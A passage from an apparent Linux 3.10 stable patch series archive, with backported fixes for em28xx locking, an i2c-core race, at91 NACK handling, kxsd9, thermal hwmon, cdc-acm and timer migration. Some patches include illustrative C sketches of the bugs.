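	return 0;	/* proceeds even when the lock was not acquired */
}

/* New check: a zero return means the lock is busy. */
static int xfer_new(struct model_lock *l)
{
	if (!model_trylock(l))
		return -EAGAIN;
	/* ... transfer would happen here ... */
	l->held = false;	/* unlock */
	return 0;
}

/* Compares both variants while another owner holds the lock. */
static void check_trylock_handling(void)
{
	struct model_lock l = { .held = true };

	assert(xfer_old(&l) == 0);		/* bug: carries on unlocked */
	assert(xfer_new(&l) == -EAGAIN);	/* fix: reports contention */
}
```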

Fixes: aab3125c43d8 ('[media] em28xx: add support for registering multiple i2c buses')

Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Mauro Carvalho Chehab <mchehab@osg.samsung.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/media/usb/em28xx/em28xx-i2c.c | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/drivers/media/usb/em28xx/em28xx-i2c.c b/drivers/media/usb/em28xx/em28xx-i2c.c
index c4ff973..d28d906 100644
--- a/drivers/media/usb/em28xx/em28xx-i2c.c
+++ b/drivers/media/usb/em28xx/em28xx-i2c.c
@@ -469,9 +469,8 @@ static int em28xx_i2c_xfer(struct i2c_adapter *i2c_adap,
 	int addr, rc, i;
 	u8 reg;
 
-	rc = rt_mutex_trylock(&dev->i2c_bus_lock);
-	if (rc < 0)
-		return rc;
+	if (!rt_mutex_trylock(&dev->i2c_bus_lock))
+		return -EAGAIN;
 
 	/* Switch I2C bus if needed */
 	if (bus != dev->cur_i2c_bus &&
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 191/319] i2c: core: fix NULL pointer dereference under race condition
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (89 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 190/319] em28xx-i2c: rt_mutex_trylock() returns zero on failure Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 192/319] i2c: at91: fix write transfers by clearing pending interrupt first Willy Tarreau
                   ` (127 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Vladimir Zapolskiy, Wolfram Sang, Willy Tarreau

From: Vladimir Zapolskiy <vladimir_zapolskiy@mentor.com>

commit 147b36d5b70c083cc76770c47d60b347e8eaf231 upstream.

Race condition between registering an I2C device driver and
deregistering an I2C adapter device which is assumed to manage that
I2C device may lead to a NULL pointer dereference due to the
uninitialized list head of driver clients.

The root cause of the issue is that the I2C bus may know about the
registered device driver and thus it is matched by bus_for_each_drv(),
but the list of clients is not initialized and commonly it is NULL,
because I2C device drivers define struct i2c_driver as static and
clients field is expected to be initialized by I2C core:

  i2c_register_driver()             i2c_del_adapter()
    driver_register()                 ...
      bus_add_driver()                ...
        ...                           bus_for_each_drv(..., __process_removed_adapter)
      ...                               i2c_do_del_adapter()
    ...                                   list_for_each_entry_safe(..., &driver->clients, ...)
    INIT_LIST_HEAD(&driver->clients);

To solve the problem it is sufficient to do clients list head
initialization before calling driver_register().
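
The effect of a zero-filled list head can be reproduced outside the
kernel with a small sketch. The list type below is a simplified
re-implementation for illustration, and count_entries() returns -1 at
the point where a real list walker would dereference NULL:

```c
#include <assert.h>
#include <stddef.h>

struct list_head { struct list_head *next, *prev; };

/* An initialised, empty list head points at itself. */
static void init_list_head(struct list_head *h)
{
	h->next = h;
	h->prev = h;
}

/*
 * Counts the entries on the list. Returns -1 if the head was never
 * initialised; a walker without this guard would follow the NULL pointer.
 */
static int count_entries(const struct list_head *head)
{
	int n = 0;

	if (head->next == NULL)
		return -1;
	for (const struct list_head *p = head->next; p != head; p = p->next)
		n++;
	return n;
}

/* Hypothetical driver object; static storage means it starts zero-filled. */
struct model_driver { struct list_head clients; };
static struct model_driver model_drv;

/* Shows the state before and after the list head is initialised. */
static void check_clients_list(void)
{
	assert(count_entries(&model_drv.clients) == -1);
	init_list_head(&model_drv.clients);
	assert(count_entries(&model_drv.clients) == 0);
}
```

Initialising the head before the object becomes visible to other code
paths is what closes the window shown in the diagram above.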

The problem was found while using an I2C device driver with a sluggish
registration routine on a bus provided by a physically detachable I2C
master controller, but practically the oops may be reproduced under
the race between arbitrary I2C device driver registration and managing
I2C bus device removal e.g. by unbinding the latter over sysfs:

% echo 21a4000.i2c > /sys/bus/platform/drivers/imx-i2c/unbind
  Unable to handle kernel NULL pointer dereference at virtual address 00000000
  Internal error: Oops: 17 [#1] SMP ARM
  CPU: 2 PID: 533 Comm: sh Not tainted 4.9.0-rc3+ #61
  Hardware name: Freescale i.MX6 Quad/DualLite (Device Tree)
  task: e5ada400 task.stack: e4936000
  PC is at i2c_do_del_adapter+0x20/0xcc
  LR is at __process_removed_adapter+0x14/0x1c
  Flags: NzCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment none
  Control: 10c5387d  Table: 35bd004a  DAC: 00000051
  Process sh (pid: 533, stack limit = 0xe4936210)
  Stack: (0xe4937d28 to 0xe4938000)
  Backtrace:
  [<c0667be0>] (i2c_do_del_adapter) from [<c0667cc0>] (__process_removed_adapter+0x14/0x1c)
  [<c0667cac>] (__process_removed_adapter) from [<c0516998>] (bus_for_each_drv+0x6c/0xa0)
  [<c051692c>] (bus_for_each_drv) from [<c06685ec>] (i2c_del_adapter+0xbc/0x284)
  [<c0668530>] (i2c_del_adapter) from [<bf0110ec>] (i2c_imx_remove+0x44/0x164 [i2c_imx])
  [<bf0110a8>] (i2c_imx_remove [i2c_imx]) from [<c051a838>] (platform_drv_remove+0x2c/0x44)
  [<c051a80c>] (platform_drv_remove) from [<c05183d8>] (__device_release_driver+0x90/0x12c)
  [<c0518348>] (__device_release_driver) from [<c051849c>] (device_release_driver+0x28/0x34)
  [<c0518474>] (device_release_driver) from [<c0517150>] (unbind_store+0x80/0x104)
  [<c05170d0>] (unbind_store) from [<c0516520>] (drv_attr_store+0x28/0x34)
  [<c05164f8>] (drv_attr_store) from [<c0298acc>] (sysfs_kf_write+0x50/0x54)
  [<c0298a7c>] (sysfs_kf_write) from [<c029801c>] (kernfs_fop_write+0x100/0x214)
  [<c0297f1c>] (kernfs_fop_write) from [<c0220130>] (__vfs_write+0x34/0x120)
  [<c02200fc>] (__vfs_write) from [<c0221088>] (vfs_write+0xa8/0x170)
  [<c0220fe0>] (vfs_write) from [<c0221e74>] (SyS_write+0x4c/0xa8)
  [<c0221e28>] (SyS_write) from [<c0108a20>] (ret_fast_syscall+0x0/0x1c)

Signed-off-by: Vladimir Zapolskiy <vladimir_zapolskiy@mentor.com>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/i2c/i2c-core.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/i2c/i2c-core.c b/drivers/i2c/i2c-core.c
index 9d539cb..c0e4143 100644
--- a/drivers/i2c/i2c-core.c
+++ b/drivers/i2c/i2c-core.c
@@ -1323,6 +1323,7 @@ int i2c_register_driver(struct module *owner, struct i2c_driver *driver)
 	/* add the driver to the list of i2c drivers in the driver core */
 	driver->driver.owner = owner;
 	driver->driver.bus = &i2c_bus_type;
+	INIT_LIST_HEAD(&driver->clients);
 
 	/* When registration returns, the driver core
 	 * will have called probe() for all matching-but-unbound devices.
@@ -1341,7 +1342,6 @@ int i2c_register_driver(struct module *owner, struct i2c_driver *driver)
 
 	pr_debug("i2c-core: driver [%s] registered\n", driver->driver.name);
 
-	INIT_LIST_HEAD(&driver->clients);
 	/* Walk the adapters that are already present */
 	i2c_for_each_dev(driver, __process_new_driver);
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 192/319] i2c: at91: fix write transfers by clearing pending interrupt first
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (90 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 191/319] i2c: core: fix NULL pointer dereference under race condition Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 193/319] iio: accel: kxsd9: Fix raw read return Willy Tarreau
                   ` (126 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Cyrille Pitchen, Ludovic Desroches, Wolfram Sang, Willy Tarreau

From: Cyrille Pitchen <cyrille.pitchen@atmel.com>

commit 6f6ddbb09d2a5baded0e23add3ad2d9e9417ab30 upstream.

In some cases a NACK interrupt may be pending in the Status Register (SR)
as a result of a previous transfer. However at91_do_twi_transfer() did not
read the SR to clear pending interrupts before starting a new transfer.
Hence a NACK interrupt rose as soon as it was enabled again at the I2C
controller level, resulting in a wrong sequence of operations and strange
patterns of behaviour on the I2C bus, such as a clock stretch followed by
a restart of the transfer.

This first issue occurred with both DMA and PIO write transfers.

Also when a NACK error was detected during a PIO write transfer, the
interrupt handler used to wrongly start a new transfer by writing into the
Transmit Holding Register (THR). Then the I2C slave was likely to reply
with a second NACK.

This second issue is fixed in atmel_twi_interrupt() by handling the TXRDY
status bit only if both the TXCOMP and NACK status bits are cleared.
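
The change in dispatch order can be sketched as a pair of pure
functions. The ST_* bit values and function names are illustrative
assumptions; only the ordering of the checks mirrors the description:

```c
#include <assert.h>
#include <stdbool.h>

/* Illustrative status bits (assumed values, for the sketch only). */
#define ST_TXCOMP	(1u << 0)
#define ST_RXRDY	(1u << 1)
#define ST_TXRDY	(1u << 2)
#define ST_NACK		(1u << 8)

/* Old order: TXRDY is acted upon even when NACK/TXCOMP are also set. */
static bool writes_thr_old(unsigned int st)
{
	if (!st)
		return false;
	if (st & ST_RXRDY)
		return false;
	return (st & ST_TXRDY) != 0;
}

/* New order: completion and NACK take priority over RXRDY and TXRDY. */
static bool writes_thr_new(unsigned int st)
{
	if (st & (ST_TXCOMP | ST_NACK))
		return false;
	if (st & ST_RXRDY)
		return false;
	return (st & ST_TXRDY) != 0;
}

/* A NACK sets NACK, TXCOMP and TXRDY together, as the patch comment says. */
static void check_nack_dispatch(void)
{
	unsigned int nack = ST_NACK | ST_TXCOMP | ST_TXRDY;

	assert(writes_thr_old(nack));	/* old code queued another byte */
	assert(!writes_thr_new(nack));	/* new code does not */
	assert(writes_thr_new(ST_TXRDY));	/* normal writes still proceed */
}
```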

Tested with an at24 eeprom on a sama5d36ek board running a linux-4.1-at91
kernel image. Adapted to linux-next.

Reported-by: Peter Rosin <peda@lysator.liu.se>
Signed-off-by: Cyrille Pitchen <cyrille.pitchen@atmel.com>
Signed-off-by: Ludovic Desroches <ludovic.desroches@atmel.com>
Tested-by: Peter Rosin <peda@lysator.liu.se>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Fixes: 93563a6a71bb ("i2c: at91: fix a race condition when using the DMA controller")
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/i2c/busses/i2c-at91.c | 58 +++++++++++++++++++++++++++++++++++++------
 1 file changed, 50 insertions(+), 8 deletions(-)

diff --git a/drivers/i2c/busses/i2c-at91.c b/drivers/i2c/busses/i2c-at91.c
index ceabcfe..c880d13 100644
--- a/drivers/i2c/busses/i2c-at91.c
+++ b/drivers/i2c/busses/i2c-at91.c
@@ -371,19 +371,57 @@ static irqreturn_t atmel_twi_interrupt(int irq, void *dev_id)
 
 	if (!irqstatus)
 		return IRQ_NONE;
-	else if (irqstatus & AT91_TWI_RXRDY)
-		at91_twi_read_next_byte(dev);
-	else if (irqstatus & AT91_TWI_TXRDY)
-		at91_twi_write_next_byte(dev);
-
-	/* catch error flags */
-	dev->transfer_status |= status;
 
+	/*
+	 * When a NACK condition is detected, the I2C controller sets the NACK,
+	 * TXCOMP and TXRDY bits all together in the Status Register (SR).
+	 *
+	 * 1 - Handling NACK errors with CPU write transfer.
+	 *
+	 * In such case, we should not write the next byte into the Transmit
+	 * Holding Register (THR) otherwise the I2C controller would start a new
+	 * transfer and the I2C slave is likely to reply by another NACK.
+	 *
+	 * 2 - Handling NACK errors with DMA write transfer.
+	 *
+	 * By setting the TXRDY bit in the SR, the I2C controller also triggers
+	 * the DMA controller to write the next data into the THR. Then the
+	 * result depends on the hardware version of the I2C controller.
+	 *
+	 * 2a - Without support of the Alternative Command mode.
+	 *
+	 * This is the worst case: the DMA controller is triggered to write the
+	 * next data into the THR, hence starting a new transfer: the I2C slave
+	 * is likely to reply by another NACK.
+	 * Concurrently, this interrupt handler is likely to be called to manage
+	 * the first NACK before the I2C controller detects the second NACK and
+	 * sets once again the NACK bit into the SR.
+	 * When handling the first NACK, this interrupt handler disables the I2C
+	 * controller interruptions, especially the NACK interrupt.
+	 * Hence, the NACK bit is pending into the SR. This is why we should
+	 * read the SR to clear all pending interrupts at the beginning of
+	 * at91_do_twi_transfer() before actually starting a new transfer.
+	 *
+	 * 2b - With support of the Alternative Command mode.
+	 *
+	 * When a NACK condition is detected, the I2C controller also locks the
+	 * THR (and sets the LOCK bit in the SR): even though the DMA controller
+	 * is triggered by the TXRDY bit to write the next data into the THR,
+	 * this data actually won't go on the I2C bus hence a second NACK is not
+	 * generated.
+	 */
 	if (irqstatus & (AT91_TWI_TXCOMP | AT91_TWI_NACK)) {
 		at91_disable_twi_interrupts(dev);
 		complete(&dev->cmd_complete);
+	} else if (irqstatus & AT91_TWI_RXRDY) {
+		at91_twi_read_next_byte(dev);
+	} else if (irqstatus & AT91_TWI_TXRDY) {
+		at91_twi_write_next_byte(dev);
 	}
 
+	/* catch error flags */
+	dev->transfer_status |= status;
+
 	return IRQ_HANDLED;
 }
 
@@ -391,6 +429,7 @@ static int at91_do_twi_transfer(struct at91_twi_dev *dev)
 {
 	int ret;
 	bool has_unre_flag = dev->pdata->has_unre_flag;
+	unsigned sr;
 
 	/*
 	 * WARNING: the TXCOMP bit in the Status Register is NOT a clear on
@@ -426,13 +465,16 @@ static int at91_do_twi_transfer(struct at91_twi_dev *dev)
 	INIT_COMPLETION(dev->cmd_complete);
 	dev->transfer_status = 0;
 
+	/* Clear pending interrupts, such as NACK. */
+	sr = at91_twi_read(dev, AT91_TWI_SR);
+
 	if (!dev->buf_len) {
 		at91_twi_write(dev, AT91_TWI_CR, AT91_TWI_QUICK);
 		at91_twi_write(dev, AT91_TWI_IER, AT91_TWI_TXCOMP);
 	} else if (dev->msg->flags & I2C_M_RD) {
 		unsigned start_flags = AT91_TWI_START;
 
-		if (at91_twi_read(dev, AT91_TWI_SR) & AT91_TWI_RXRDY) {
+		if (sr & AT91_TWI_RXRDY) {
 			dev_err(dev->dev, "RXRDY still set!");
 			at91_twi_read(dev, AT91_TWI_RHR);
 		}
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 193/319] iio: accel: kxsd9: Fix raw read return
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (91 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 192/319] i2c: at91: fix write transfers by clearing pending interrupt first Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 194/319] iio: accel: kxsd9: Fix scaling bug Willy Tarreau
                   ` (125 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Linus Walleij, Jonathan Cameron, Willy Tarreau

From: Linus Walleij <linus.walleij@linaro.org>

commit 7ac61a062f3147dc23e3f12b9dfe7c4dd35f9cb8 upstream.

Any readings from the raw interface of the KXSD9 driver will
return an empty string, because it does not return
IIO_VAL_INT but rather some random value from the accelerometer
to the caller.

Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/iio/accel/kxsd9.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/iio/accel/kxsd9.c b/drivers/iio/accel/kxsd9.c
index a22c427..d94c0ca 100644
--- a/drivers/iio/accel/kxsd9.c
+++ b/drivers/iio/accel/kxsd9.c
@@ -160,6 +160,7 @@ static int kxsd9_read_raw(struct iio_dev *indio_dev,
 		if (ret < 0)
 			goto error_ret;
 		*val = ret;
+		ret = IIO_VAL_INT;
 		break;
 	case IIO_CHAN_INFO_SCALE:
 		ret = spi_w8r8(st->us, KXSD9_READ(KXSD9_REG_CTRL_C));
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 194/319] iio: accel: kxsd9: Fix scaling bug
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (92 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 193/319] iio: accel: kxsd9: Fix raw read return Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 195/319] thermal: hwmon: Properly report critical temperature in sysfs Willy Tarreau
                   ` (124 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Linus Walleij, Jonathan Cameron, Willy Tarreau

From: Linus Walleij <linus.walleij@linaro.org>

commit 307fe9dd11ae44d4f8881ee449a7cbac36e1f5de upstream.

All the scaling of the KXSD9 involves multiplication by a
fractional number < 1.

However the scaling value returned from IIO_INFO_SCALE was
unpredictable as only the micros part of the value was assigned, and
not the integer part, resulting in scaling like this:

$cat in_accel_scale
-1057462640.011978

Fix this by assigning zero to the integer part.
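
A small sketch of how an integer-plus-micro pair is rendered shows where
the stray number comes from. format_int_plus_micro() is a hypothetical
helper, not the IIO core's formatter, and the garbage integer is simply
the value from the output quoted above:

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Renders "integer.micro" with the micro part zero-padded to six digits. */
static int format_int_plus_micro(char *buf, size_t len, int val, int val2)
{
	return snprintf(buf, len, "%d.%06d", val, val2);
}

/* Compares an unassigned integer part with one explicitly set to zero. */
static void check_scale_format(void)
{
	char buf[32];

	/* Integer part left unassigned: whatever happened to be there. */
	format_int_plus_micro(buf, sizeof(buf), -1057462640, 11978);
	assert(strcmp(buf, "-1057462640.011978") == 0);

	/* Integer part assigned zero, as the fix does. */
	format_int_plus_micro(buf, sizeof(buf), 0, 11978);
	assert(strcmp(buf, "0.011978") == 0);
}
```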

Tested-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/iio/accel/kxsd9.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/iio/accel/kxsd9.c b/drivers/iio/accel/kxsd9.c
index d94c0ca..4f9d178 100644
--- a/drivers/iio/accel/kxsd9.c
+++ b/drivers/iio/accel/kxsd9.c
@@ -166,6 +166,7 @@ static int kxsd9_read_raw(struct iio_dev *indio_dev,
 		ret = spi_w8r8(st->us, KXSD9_READ(KXSD9_REG_CTRL_C));
 		if (ret < 0)
 			goto error_ret;
+		*val = 0;
 		*val2 = kxsd9_micro_scales[ret & KXSD9_FS_MASK];
 		ret = IIO_VAL_INT_PLUS_MICRO;
 		break;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 195/319] thermal: hwmon: Properly report critical temperature in sysfs
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (93 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 194/319] iio: accel: kxsd9: Fix scaling bug Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 196/319] cdc-acm: fix wrong pipe type on rx interrupt xfers Willy Tarreau
                   ` (123 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Krzysztof Kozlowski, Zhang Rui, Willy Tarreau

From: Krzysztof Kozlowski <krzk@kernel.org>

commit f37fabb8643eaf8e3b613333a72f683770c85eca upstream.

In the critical sysfs entry the thermal hwmon was returning the wrong
temperature to user space.  It was reporting the temperature of the
first trip point instead of the temperature of the critical trip point.

For example:
	/sys/class/hwmon/hwmon0/temp1_crit:50000
	/sys/class/thermal/thermal_zone0/trip_point_0_temp:50000
	/sys/class/thermal/thermal_zone0/trip_point_0_type:active
	/sys/class/thermal/thermal_zone0/trip_point_3_temp:120000
	/sys/class/thermal/thermal_zone0/trip_point_3_type:critical

Since commit e68b16abd91d ("thermal: add hwmon sysfs I/F") the driver
has been registering a sysfs entry if the get_crit_temp() callback was
provided.  However, when accessed, it was calling get_trip_temp() instead
of get_crit_temp().

Fixes: e68b16abd91d ("thermal: add hwmon sysfs I/F")
Signed-off-by: Krzysztof Kozlowski <krzk@kernel.org>
Signed-off-by: Zhang Rui <rui.zhang@intel.com>
[wt: s/thermal_hwmon.c/thermal_core.c in 3.10]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/thermal/thermal_core.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/thermal/thermal_core.c b/drivers/thermal/thermal_core.c
index d755440..f9bf597 100644
--- a/drivers/thermal/thermal_core.c
+++ b/drivers/thermal/thermal_core.c
@@ -924,7 +924,7 @@ temp_crit_show(struct device *dev, struct device_attribute *attr,
 	long temperature;
 	int ret;
 
-	ret = tz->ops->get_trip_temp(tz, 0, &temperature);
+	ret = tz->ops->get_crit_temp(tz, &temperature);
 	if (ret)
 		return ret;
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 196/319] cdc-acm: fix wrong pipe type on rx interrupt xfers
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (94 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 195/319] thermal: hwmon: Properly report critical temperature in sysfs Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 197/319] timers: Use proper base migration in add_timer_on() Willy Tarreau
                   ` (122 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Gavin Li, Greg Kroah-Hartman, Willy Tarreau

From: Gavin Li <git@thegavinli.com>

commit add125054b8727103631dce116361668436ef6a7 upstream.

This fixes the "BOGUS urb xfer" warning logged by usb_submit_urb().

Signed-off-by: Gavin Li <git@thegavinli.com>
Acked-by: Oliver Neukum <oneukum@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/class/cdc-acm.c | 5 ++---
 drivers/usb/class/cdc-acm.h | 1 -
 2 files changed, 2 insertions(+), 4 deletions(-)

diff --git a/drivers/usb/class/cdc-acm.c b/drivers/usb/class/cdc-acm.c
index e7436eb..b364845 100644
--- a/drivers/usb/class/cdc-acm.c
+++ b/drivers/usb/class/cdc-acm.c
@@ -1213,7 +1213,6 @@ made_compressed_probe:
 	spin_lock_init(&acm->write_lock);
 	spin_lock_init(&acm->read_lock);
 	mutex_init(&acm->mutex);
-	acm->rx_endpoint = usb_rcvbulkpipe(usb_dev, epread->bEndpointAddress);
 	acm->is_int_ep = usb_endpoint_xfer_int(epread);
 	if (acm->is_int_ep)
 		acm->bInterval = epread->bInterval;
@@ -1262,14 +1261,14 @@ made_compressed_probe:
 		urb->transfer_dma = rb->dma;
 		if (acm->is_int_ep) {
 			usb_fill_int_urb(urb, acm->dev,
-					 acm->rx_endpoint,
+					 usb_rcvintpipe(usb_dev, epread->bEndpointAddress),
 					 rb->base,
 					 acm->readsize,
 					 acm_read_bulk_callback, rb,
 					 acm->bInterval);
 		} else {
 			usb_fill_bulk_urb(urb, acm->dev,
-					  acm->rx_endpoint,
+					  usb_rcvbulkpipe(usb_dev, epread->bEndpointAddress),
 					  rb->base,
 					  acm->readsize,
 					  acm_read_bulk_callback, rb);
diff --git a/drivers/usb/class/cdc-acm.h b/drivers/usb/class/cdc-acm.h
index 1683ac1..bf4e1bb 100644
--- a/drivers/usb/class/cdc-acm.h
+++ b/drivers/usb/class/cdc-acm.h
@@ -95,7 +95,6 @@ struct acm {
 	struct urb *read_urbs[ACM_NR];
 	struct acm_rb read_buffers[ACM_NR];
 	int rx_buflimit;
-	int rx_endpoint;
 	spinlock_t read_lock;
 	int write_used;					/* number of non-empty write buffers */
 	int transmitting;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 197/319] timers: Use proper base migration in add_timer_on()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (95 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 196/319] cdc-acm: fix wrong pipe type on rx interrupt xfers Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 198/319] EDAC: Increment correct counter in edac_inc_ue_error() Willy Tarreau
                   ` (121 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Tejun Heo, Chris Worley, bfields, Michael Skralivetsky,
	Trond Myklebust, Shaohua Li, Jeff Layton, kernel-team,
	Thomas Gleixner, Mike Galbraith, Willy Tarreau

From: Tejun Heo <tj@kernel.org>

commit 22b886dd1018093920c4250dee2a9a3cb7cff7b8 upstream.

Regardless of the previous CPU a timer was on, add_timer_on()
currently simply sets timer->flags to the new CPU.  As the caller must
be seeing the timer as idle, this is locally fine, but the timer
leaving the old base while unlocked can lead to race conditions as
follows.

Let's say timer was on cpu 0.

  cpu 0					cpu 1
  -----------------------------------------------------------------------------
  del_timer(timer) succeeds
					del_timer(timer)
					  lock_timer_base(timer) locks cpu_0_base
  add_timer_on(timer, 1)
    spin_lock(&cpu_1_base->lock)
    timer->flags set to cpu_1_base
    operates on @timer			  operates on @timer

This triggered with mod_delayed_work_on() which contains
"if (del_timer()) add_timer_on()" sequence eventually leading to the
following oops.

  BUG: unable to handle kernel NULL pointer dereference at           (null)
  IP: [<ffffffff810ca6e9>] detach_if_pending+0x69/0x1a0
  ...
  Workqueue: wqthrash wqthrash_workfunc [wqthrash]
  task: ffff8800172ca680 ti: ffff8800172d0000 task.ti: ffff8800172d0000
  RIP: 0010:[<ffffffff810ca6e9>]  [<ffffffff810ca6e9>] detach_if_pending+0x69/0x1a0
  ...
  Call Trace:
   [<ffffffff810cb0b4>] del_timer+0x44/0x60
   [<ffffffff8106e836>] try_to_grab_pending+0xb6/0x160
   [<ffffffff8106e913>] mod_delayed_work_on+0x33/0x80
   [<ffffffffa0000081>] wqthrash_workfunc+0x61/0x90 [wqthrash]
   [<ffffffff8106dba8>] process_one_work+0x1e8/0x650
   [<ffffffff8106e05e>] worker_thread+0x4e/0x450
   [<ffffffff810746af>] kthread+0xef/0x110
   [<ffffffff8185980f>] ret_from_fork+0x3f/0x70

Fix it by updating add_timer_on() to perform proper migration as
__mod_timer() does.
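
The migration pattern can be sketched in userspace with C11 atomics.
This is a simplified model under stated assumptions: the model_* types
and helpers are hypothetical, a spinning atomic_flag stands in for the
base spinlock, and interrupt state and flag bits are ignored.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stddef.h>

struct model_base { atomic_flag lock; };
struct model_timer { _Atomic(struct model_base *) base; };

static void base_lock(struct model_base *b)
{
	while (atomic_flag_test_and_set_explicit(&b->lock, memory_order_acquire))
		;	/* spin until the lock is free */
}

static void base_unlock(struct model_base *b)
{
	atomic_flag_clear_explicit(&b->lock, memory_order_release);
}

/* Lock whichever base the timer is on, retrying if it moves meanwhile. */
static struct model_base *model_lock_timer_base(struct model_timer *t)
{
	for (;;) {
		struct model_base *b = atomic_load(&t->base);

		if (b != NULL) {
			base_lock(b);
			if (b == atomic_load(&t->base))
				return b;
			base_unlock(b);	/* timer migrated; try again */
		}
	}
}

/*
 * Move the timer to new_base with the old base locked during the switch.
 * base is NULL while in flight, so concurrent lockers spin rather than
 * proceed with the wrong base locked. Returns new_base, locked.
 */
static struct model_base *model_migrate(struct model_timer *t,
					struct model_base *new_base)
{
	struct model_base *b = model_lock_timer_base(t);

	assert(new_base != NULL);
	if (b != new_base) {
		atomic_store(&t->base, NULL);
		base_unlock(b);
		b = new_base;
		base_lock(b);
		atomic_store(&t->base, b);
	}
	return b;
}
```

The caller is expected to release the returned base with base_unlock()
once it has finished queueing the timer.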

Mike: apply tglx backport

Reported-and-tested-by: Jeff Layton <jlayton@poochiereds.net>
Signed-off-by: Tejun Heo <tj@kernel.org>
Cc: Chris Worley <chris.worley@primarydata.com>
Cc: bfields@fieldses.org
Cc: Michael Skralivetsky <michael.skralivetsky@primarydata.com>
Cc: Trond Myklebust <trond.myklebust@primarydata.com>
Cc: Shaohua Li <shli@fb.com>
Cc: Jeff Layton <jlayton@poochiereds.net>
Cc: kernel-team@fb.com
Cc: stable@vger.kernel.org
Link: http://lkml.kernel.org/r/20151029103113.2f893924@tlielax.poochiereds.net
Link: http://lkml.kernel.org/r/20151104171533.GI5749@mtj.duckdns.org
